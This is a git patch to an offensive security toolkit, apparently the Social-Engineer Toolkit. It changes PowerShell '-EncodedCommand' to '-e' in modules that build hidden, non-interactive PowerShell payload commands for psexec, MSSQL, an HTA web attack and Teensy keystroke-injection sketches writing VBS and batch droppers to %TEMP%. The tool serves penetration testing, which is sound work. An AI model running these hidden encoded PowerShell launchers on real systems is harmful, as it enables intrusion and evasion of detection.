From 0ff64fcae02f4168ad45ae64b374e3f5f97beab2 Mon Sep 17 00:00:00 2001
From: TrustedSec <info@trustedsec.com>
Date: Thu, 13 Oct 2016 23:13:53 -0400
Subject: [PATCH] convert encodedcommand to -e abbreviated

---
 readme/CHANGELOG             | 6 ++++++
 src/fasttrack/mssql.py       | 2 +-
 src/fasttrack/psexec.py      | 2 +-
 src/powershell/powershell.py | 2 +-
 src/teensy/binary2teensy.py  | 2 +-
 src/teensy/sd2teensy.py      | 2 +-
 src/webattack/hta/main.py    | 2 +-
 7 files changed, 12 insertions(+), 6 deletions(-)

diff --git a/readme/CHANGELOG b/readme/CHANGELOG
index 3a7364571..fe2a0fe63 100644
--- a/readme/CHANGELOG
+++ b/readme/CHANGELOG
@@ -1,3 +1,9 @@
+~~~~~~~~~~~~~~~~
+version 7.4.1
+~~~~~~~~~~~~~~~~
+
+* converted all powershell encodedcommand to abbreviated
+
 ~~~~~~~~~~~~~~~~
 version 7.4
 ~~~~~~~~~~~~~~~~
diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py
index 0e441130c..ea92aefe7 100644
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@@ -262,7 +262,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
         x86 = file(core.setdir + "x86.powershell").read().rstrip()
         #    x86 = x86.read()
 
-        x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
+        x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
         core.print_status("If you want the powershell commands and attack, "
                           "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
         filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py
index 2e72fa1c6..fcdf97323 100644
--- a/src/fasttrack/psexec.py
+++ b/src/fasttrack/psexec.py
@@ -86,7 +86,7 @@ try:
     #with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
     #    x86 = fileopen.read()
     x86 = open(core.setdir + "x86.powershell", "r").read()
-    x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
+    x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
     core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
     filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
     filewrite.write(x86)
diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py
index a93d97c5a..13933ddcf 100644
--- a/src/powershell/powershell.py
+++ b/src/powershell/powershell.py
@@ -57,7 +57,7 @@ if powershell_menu_choice != "99":
         # here we format everything for us
         with  open(core.setdir + "/x86.powershell") as fileopen:
             x86 = fileopen.read()
-        x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
+        x86 = "powershell -nop -window hidden -noni -e " + x86
         core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
         with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
             filewrite.write(x86)
diff --git a/src/teensy/binary2teensy.py b/src/teensy/binary2teensy.py
index d532c067b..71a1562a7 100644
--- a/src/teensy/binary2teensy.py
+++ b/src/teensy/binary2teensy.py
@@ -373,7 +373,7 @@ void loop()
   // run through cmd
   CommandAtRunBar("cmd");
   delay(1000);
-  Keyboard.println("powershell -EncodedCommand {powershell_command}");
+  Keyboard.println("powershell -e {powershell_command}");
   delay(4000);
   Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
   Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
diff --git a/src/teensy/sd2teensy.py b/src/teensy/sd2teensy.py
index 5260e28c6..2529081e4 100644
--- a/src/teensy/sd2teensy.py
+++ b/src/teensy/sd2teensy.py
@@ -174,7 +174,7 @@ void setup()
   // run through cmd
   CommandAtRunBar("cmd");
   delay(1000);
-  Keyboard.println("powershell -EncodedCommand {powershell_command}");
+  Keyboard.println("powershell -e {powershell_command}");
   // Tweak this delay.  Larger files take longer to decode through powershell.
   delay(10000);
   Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
diff --git a/src/webattack/hta/main.py b/src/webattack/hta/main.py
index 42ab89129..fef21d30e 100644
--- a/src/webattack/hta/main.py
+++ b/src/webattack/hta/main.py
@@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
         "Generating powershell injection code and x86 downgrade attack...")
     ps = generate_powershell_alphanumeric_payload(
         selection, ipaddr, port, "x86")
-    command = ("powershell -window hidden -EncodedCommand " + ps)
+    command = ("powershell -window hidden -e " + ps)
     # hta code here
     print_status("Embedding HTA attack vector and PowerShell injection...")
     # grab cloned website